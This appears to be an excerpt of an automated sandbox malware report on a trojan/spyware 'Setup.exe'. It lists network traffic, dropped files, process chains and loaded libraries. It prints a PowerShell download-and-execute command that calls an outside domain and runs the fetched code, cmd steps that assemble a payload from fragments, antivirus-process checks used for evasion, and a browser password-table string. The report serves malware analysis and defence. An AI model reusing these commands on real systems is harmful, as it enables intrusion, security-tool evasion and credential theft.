        Source: global traffic DNS traffic detected: DNS query: klipvumisui.shop
        Source: global traffic DNS traffic detected: DNS query: dfgh.online
        Source: unknown HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: yokesandusj.sbs
        Source: powershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dfgh.online
        Source: powershell.exe, 00000011.00000002.2554947823.0000000004591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dfgh.online/invoker.php?compName=
        Source: powershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
        Source: powershell.exe, 00000011.00000002.2554408777.00000000028E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dfgh.online/invoker.php?compname=
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
        Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
        Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
        Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
        Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49842 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49846 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49853 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49860 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49867 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49877 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49888 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49897 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49910 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49920 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49927 version: TLS 1.2
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW

        System Summary

        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Window found: window name: AutoHotkey
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\LimitationReid
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\WhyBedroom
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\UpdatesLiked
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\AnalysesDoctors
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\BeginnersPhotograph
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\AffiliatesTip
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\RapidlyFinland
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\DeutschMarc
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\MemorabiliaEnvironmental
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_0040497C
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406ED2
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004074BB
        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
        Source: C:\Users\user\Desktop\Setup.exe Code function: String function: 004062A3 appears 58 times
        Source: Setup.exe Static PE information: invalid certificate
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: T0VC3MU5SNNFXQB43V5.exe.13.dr Static PE information: Number of sections : 11 > 10
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.dr Static PE information: Number of sections : 11 > 10
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.dr Static PE information: Number of sections : 11 > 10
        Source: Setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@84/35@5/3
        Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004024FB CoCreateInstance
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Und
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:428:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3692:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
        Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsv117.tmp
        Source: Setup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\findstr.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
        Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
        Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
        Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
        Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
        Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
        Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
        Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
        Source: tasklist.exe, 0000002B.00000002.3034028705.000002EC9257D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'S;.VBE;.JS55_6
        Source: tasklist.exe, 0000002B.00000003.3033282077.000002EC9257D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'S;.VBE;.JS
        Source: M.com, 0000000D.00000003.2443122804.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Setup.exe Virustotal: Detection: 8%
        Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\user\Desktop\Setup.exe
        Source: unknown Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
        Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 811185
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Thousand
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "makes" Makes
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.com
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard c
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com M.com c
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com Process created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe Process created: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp "C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$60296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe Process created: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp "C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Windows\System32\timeout.exe "timeout" 9
        Source: C:\Windows\System32\timeout.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: acgenral.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmm.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: samcli.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: msacm32.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wsock32.dllJump to behavior
